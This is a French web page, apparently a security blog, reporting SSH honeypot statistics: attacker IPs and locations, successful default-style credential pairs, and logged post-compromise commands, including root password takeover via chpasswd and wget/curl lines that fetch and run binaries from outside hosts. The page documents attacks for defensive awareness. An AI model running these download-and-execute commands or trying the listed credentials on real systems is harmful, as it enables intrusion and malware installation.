Le tableau ci-dessous, représente une activité journalière de notre honeypot.
Informations journalières | | Heure locale du honeypot | Thursday, 15-04-21, 03:52 (GTM +1) |
|
|
| Nombre des cyberattaques d'aujourd'hui | 9769 |
| Attaquant récent | 212.102.35.145 |
| Provenance géographique du dernier attaquant | Netherlands (NL) |
Voici la représentation graphique de l'activité quotidienne de notre honeypot. Les points indiquent le nombre des cyberattaques reçues par jour.
Le graphique ci-dessous représente les vingt jours de plus grand nombre des cyberattaques reçues, qui ont été enregistrées par notre honeypot.
Nous pouvons visualiser aussi la représentation graphique des dix combinaisons des noms d'utilisateurs et des mots de passe, le plus souvent utilisées par les attaquants. C'est le graphique ci-dessous.
Géolocalisation des attaquants
Nous allons choisir les dix plus grands attaquants dans la base des données de notre honeypot et procéder à leurs géolocalisation. Nous allons entrer ces données dans le tableau ci-dessous:
| Informations au sujet de la géolocalisation et classement des dix attaquats le plus actifs |
|---|
|
| N° | Adresse IP | Attaques | Ville | Région | Pays | Code | Latitude | Longitude | nom d'hôte |
|---|
| 1 | 112.85.42.232 | 44496 | Xinpu | Jiangsu | China | CN | 34.5997 | 119.1594 | 112.85.42.232 |
| 2 | 112.85.42.238 | 34909 | Xinpu | Jiangsu | China | CN | 34.5997 | 119.1594 | 112.85.42.238 |
| 3 | 49.88.112.110 | 33769 | Shanghai | Shanghai | China | CN | 31.0449 | 121.4012 | 49.88.112.110 |
| 4 | 112.85.42.229 | 27705 | Xinpu | Jiangsu | China | CN | 34.5997 | 119.1594 | 112.85.42.229 |
| 5 | 183.230.135.237 | 26987 | Chongqing | Chongqing | China | CN | 29.5569 | 106.5531 | 183.230.135.237 |
| 6 | 134.228.170.174 | 13134 | Sylvania | Ohio | United States | US | 41.7061 | -83.7044 | cm-134-228-170-174.buckeyecom.net |
| 7 | 218.76.215.4 | 12627 | Yongzhou | Hunan | China | CN | 26.4239 | 111.6131 | 218.76.215.4 |
| 8 | 45.227.255.204 | 12232 | | | Panama | PA | 9 | -80 | hosting-by.web4net.org |
| 9 | 142.93.8.147 | 11136 | North Bergen | New Jersey | United States | US | 40.793 | -74.0247 | 142.93.8.147 |
| 10 | 88.137.55.65 | 10730 | Rantzwiller | Haut-Rhin | France | FR | 47.6524 | 7.3751 | 65.55.137.88.rev.sfr.net |
Afin de visualiser le volume des cyberattaques de chaqun d'entre eux, nous allons ajouter les codes des pays (à deux lettres) après leurs adresses IP. Nous obtiendrons ainsi leurs provenance géographique.
Sur le graphique ci-dessous, nous pouvons voir le volume des cyberattaques ainsi que les données de la géolocalisation des attaquant les plus actifs.
Ceci nous premet d'afficher les données du volume des cyberattaques en fonction des pays de leurs origines. Ci-dessous nous avons la représentation graphique du volume global des cyberattaques reçues en fonction la géolocalisation des attaquants les plus actifs.
Certains attaquants ont réussi à trouver les bonnes combinaisons login/mot de passe, ce qui nous a permis à observer leurs attaques. Voici la présentation des certaines données recueillies:
Voici la représentation graphique du ratio des cyberattaques "réussies". Pour cela, regardons le graphique présent ci-dessous. La raison du ratio des réussites si faible c'est utilisation des mots de passe assez forts et robustes. Nous savons qu'ils sont présents dans les wordlists des attaquants et la réussite ce n'est qu'une question de temps. La raison de cette politique était de ne pas avoir d'attaques réussies depuis les réseaux de botnets, qui ciblent la majorité des péripheriques IoT. C'est pour mieux simmuler les condition d'une petite entreprise beneficiant des services proposés par une petite sociéte de l'infogérance dans ce temps d'une pandemie du COVID-19.
Ci-dessous, nous trouvons le graphique affichant les intrusions hébdomadaires enregistrées par notre honeypot. Les points de la courbe indiquent le nombre total d'intrusions dans la même jornée.
Le graphique ci-dessous affiche les vingt jours ayant le plus grand nombres d'intrusions. Les chiffres indiquent combien de fois des informations d'identification correctes (login et mot de passe) ont été saisies par les attaquants.
Le graphe ci-dessous affiche le nombre d'intrusions réussies à partir de la même adresse IP. Les nombres indiquent combien de fois le même attaquant avait réussi d'ouvrir la session en saisissant le login et mot de passe correctement.
Nous allons procéder à la géolocalisation des adresses IP des dix attaquants, qui ont le taux de réussite le plus important.
| Informations au sujet des ressources et de la géolocalisation des dix attaquants ayant le plus grand nombe d'intrusions |
|---|
|
| N° | Vu pour la dernière fois | Adresse IP | Pays | Total Intrusions | Dernier Login utilisé | Dernier Mot de passe utilisé |
|---|
| 1 | Thursday, 15-Apr-2021, 00:29 (GTM +1) | 193.105.134.45 | Sweden | 450 | admin | 1qaz2wsx |
| 2 | Thursday, 15-Apr-2021, 02:44 (GTM +1) | 195.3.147.47 | Latvia | 434 | admin | 1qaz2wsx |
| 3 | Thursday, 08-Oct-2020, 19:04 (GTM +1) | 112.85.42.232 | China | 242 | root | 1qaz@WSX3edc$RFV |
| 4 | Monday, 25-Jan-2021, 20:52 (GTM +1) | 49.88.112.110 | China | 112 | root | 1qaz2wsx123 |
| 5 | Monday, 25-Jan-2021, 20:55 (GTM +1) | 154.223.167.54 | Hong Kong | 63 | root | 1qaz2wsx123 |
| 6 | Sunday, 20-Sep-2020, 06:47 (GTM +1) | 112.85.42.229 | China | 51 | root | 1qaz2wsx123 |
| 7 | Wednesday, 14-Apr-2021, 04:04 (GTM +1) | 109.236.91.85 | Netherlands | 50 | admin | 1qaz2wsx |
| 8 | Thursday, 24-Sep-2020, 07:57 (GTM +1) | 112.85.42.238 | China | 20 | root | 1qaz2wsx123 |
| 9 | Monday, 10-Aug-2020, 14:46 (GTM +1) | 98.159.99.227 | United States | 18 | root | 1qaz@WSX3edc$RFV |
| 10 | Tuesday, 01-Sep-2020, 14:20 (GTM +1) | 98.159.99.25 | United States | 17 | root | 1qaz2wsx123 |
Dans ce tableau, nous pouvons voir aussi les derniers mots de passe utilisés par les attaquants qui leur ont permis d'accéder au système. Remarquez que ce sont les mots de passe "standard" utilisés par beaucoup de professionels de l'infogérance (je ne vais pas citer les noms ici...).
Pour contempler les dix "combinaisons gagnantes", regardons le graphique ci-dessous.
Par cette petite experience, nous avons démontré que l'authentification par login et mot de passe n'est pas une méthode de protection suffisante. Afin de mieux protéger notre serveur ssh contre ces cyberattaques, la méthode des clefs et/ou deuxième facteur d'authentification sera le meilleur choix. Il est également dangereux d'autoriser le login "root" dans la configuration du serveur..
Certains attaquants vont essayer de détourner "notre serveur" afin de s’en servir de relais pour mener des actions cybercriminelles et malveillantes, voler nos données, ou tout simplement, utiliser nos ressources pour miner la crypto-monnaie. Ces attaques sont de plus en plus fréquentes et ça arrive plus souvent qu'on y croit. Ce ne sont pas que de grandes entreprises qui sont visées. Nous allons voir ce que les attaquants espèrent d'obtenir en s'attaquant à notre "serveur". La plupart d'attaques provient des divers réseaux botnets. Le problème de ces attaques est la saturation de la bande passante du serveur, parce que nous utilisons les mots de passe assez forts. Nous allons voir ici, les autres types des intrusions et tentatives de détournement du système. Penser que "lorsqu'on a rien à cacher, on ne sera pas ciblé " - est une fausse idée reçue. Tout le monde est concerné et non seulement des grands entreprises. La seule difference est que dans le cas d'une grande entreprise, les problèmes des cyberattaques qui les ont touchées, étaient immédiatement médiatisé...
Nous devons être conscients que le serveur ssh sert à administrer notre machine. C'est une raison suffisante pour qu'il soit particulièrement bien sécurisé.
Le graphique du dessous montre une activité post-compromise journalière. Il prends en compte le nombre d'intrusions pour chaque jour de fonctionnement du honeypot. Ici il s'agit des véritables tentatives de prise de contrôle de notre "serveur".
Le tableau ci-dessous montre les dix commandes "passwd et chpasswd" utilisées par les attaquants affin de modifier le mot de passe et prendre le contrôle totale de notre serveur et par la même occasion, nous empêcher d'y accèder.
| ID | Date | Les dix dernières commandes "passwd & chpasswd" |
|---|
| 1 | Wednesday, 14-Apr-2021, 21:25 | echo "root:6Xx23QaOjKvA"|chpasswd|bash |
| 2 | Wednesday, 14-Apr-2021, 20:10 | echo "root:LaYVazKIW3Br"|chpasswd|bash |
| 3 | Tuesday, 13-Apr-2021, 21:00 | echo "1qaz2wsx\nV0gsdHloqZ7q\nV0gsdHloqZ7q\n"|passwd |
| 4 | Tuesday, 13-Apr-2021, 21:00 | echo -e "1qaz2wsx\nV0gsdHloqZ7q\nV0gsdHloqZ7q"|passwd|bash |
| 5 | Monday, 12-Apr-2021, 23:41 | echo "root:hzXjMXYC6niX"|chpasswd|bash |
| 6 | Monday, 12-Apr-2021, 15:35 | echo "1qaz2wsx\nYKNcCOePNTaX\nYKNcCOePNTaX\n"|passwd |
| 7 | Monday, 12-Apr-2021, 15:35 | echo -e "1qaz2wsx\nYKNcCOePNTaX\nYKNcCOePNTaX"|passwd|bash |
| 8 | Monday, 12-Apr-2021, 13:57 | echo "root:oDuxPfFtq1tV"|chpasswd|bash |
| 9 | Monday, 12-Apr-2021, 13:13 | echo "root:HPXni4pKwmE5"|chpasswd|bash |
| 10 | Saturday, 10-Apr-2021, 13:27 | echo "root:fFG8Q1GL6sME"|chpasswd|bash |
Le tableau suivant affiche les dix commandes le plus fréquemment utilisées par les attaquants. Cela sert à effectuer un repèrage simplifié. Remarquez que beaucoup de commandes, ce sont celles qui indiquent le type du processeur utilisé et la quantité de la mémoire installée, ce qui est très utile pour installer un crypto-miner (monnaie viruelle). En installant un crypto-miner, le cybercriminel utilisera les ressources de la machine cible pour miner de l'argent virtuel pour sa part à l'insu de son propriétaire legitime. Cela se traduira par la surcharge du processeur (donc une surconsommation électrique), la surchauffe et le rallentissement considérable de la machine infectée. Dans le cas d'installation d'un autre malware, comme par exeple un backdoor, il pourra alors contrôler la machine infectée en la transformant en relais pour relayer les cyberattaques ou mener d'autres activités cybercriminelles.
| N° | Les dix commandes fréquemment utilisées (général) | Nombre d'entrées |
|---|
| 1 | cat /proc/cpuinfo | grep name | wc -l | 182 |
| 2 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | 182 |
| 3 | cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;} | 182 |
| 4 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | 182 |
| 5 | free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7} | 182 |
| 6 | ls -lh $(which ls) | 182 |
| 7 | which ls | 182 |
| 8 | crontab -l | 182 |
| 9 | w | 182 |
| 10 | uname -m | 182 |
Le tableau du dessous affiche dix dernières commandes wget et execution des scripts. Il s'agit bien des malwares que les attaquants tentent de nous faire télécharger afin de les installer dans notre système. Ces malwares pouraient être des backdoors, comme aussi des crypto-miners. Puisqu'avant d'executer un script sur notre système, l'attaquant doit procéder à son télechargement et comme il arrive assez souvent que c'est la même ligne de commande dans un terminal, nous les avons mis dans le même tableau.
| N° | Date | Les dix dernières commandes "wget" et execution des scripts |
|---|
| 1 | 25-Jan-2021 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.105.55/53; curl -O http://98.159.105.55/53; chmod +x 53; ./53; |
| 2 | 25-Jan-2021 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.105.55/21; curl -O http://98.159.105.55/21; chmod +x 21; ./21; |
| 3 | 22-Jan-2021 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.105.55/23; curl -O http://98.159.105.55/23; chmod +x 23; ./23; |
| 4 | 11-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.47/8000; curl -O http://98.159.99.47/8000; chmod +x 8000; ./8000; |
| 5 | 11-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/53; curl -O http://98.159.99.39/53; chmod +x 53; ./53; |
| 6 | 10-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.47/53; curl -O http://98.159.99.47/53; chmod +x 53; ./53; |
| 7 | 10-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3306; curl -O http://98.159.99.39/3306; chmod +x 3306; ./3306; |
| 8 | 10-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3306; curl -O http://98.159.99.39/3306; chmod +x 3306; ./3306; |
| 9 | 09-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3309; curl -O http://98.159.99.39/3309; chmod +x 3309; ./3309; |
| 10 | 08-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.12/3309; curl -O http://98.159.99.12/3309; chmod +x 3309; ./3309; |
Voilà, notre petite "visite guidée" touche à sa fin. Soyez prudents et ne négligez pas les risques cyber. La cybermenace est bien réelle et les attaquants ne seront jamais gentils avec vous.
Géolocalisation: www.maxmind.com
Nous utilisons des cookies pour nous assurer de vous offrir la meilleure expérience sur notre site Web. L'utilisation continue de ce site indique que vous acceptez cette politique .
En savoir plus.
J'accepte
Avec bon antivirus vous serez suffisamment proeger et pas besoins de plus
Et comment un antivirus pourra protéger le système face à ce type d’attaques?